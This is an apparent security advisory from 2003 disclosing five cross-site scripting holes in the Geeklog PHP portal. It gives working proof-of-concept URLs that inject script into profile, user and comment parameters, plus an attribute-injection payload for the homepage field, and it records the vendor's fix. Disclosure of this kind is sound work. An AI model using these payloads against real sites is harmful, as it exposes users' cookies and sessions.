nothing new. typical XSS bugs.

summary
=======

Geeklog is a web portal system written in PHP. There exist 5 XSS holes in the software.

the 'holes'
===========

--1--
http://vulnerable.host/profiles.php?uid=<script>alert(document.cookie)</script>

--2--
http://vulnerable.host/users.php?mode=profile&uid=<script>alert(document.cookie)</script>

--3--
http://vulnerable.host//comment.php?mode=Delete&sid=1&cid=<script>alert(document.cookie)</script>

--4--
http://vulnerable.host//profiles.php?what=contact&author=ich&authoremail=bla%40bla.com&subject=hello&message=text&uid=<script>alert(document.cookie)</script>

--5--
The 'homepage' field in the user's account information page is not sanitised properly. As a result, JavaScript can be injected by setting the 'homepage' field like this:

http://url" onmouseover="alert(document.cookie)

** 3) & 4) were found by Dirk Haun of Geeklog Team.

vendor status
=============

03/01/2003 contacted Dirk Haun of Geeklog team
14/01/2003 Geeklog 1.3.7sr1 was released. New version closes all holes found.

--==snooq==--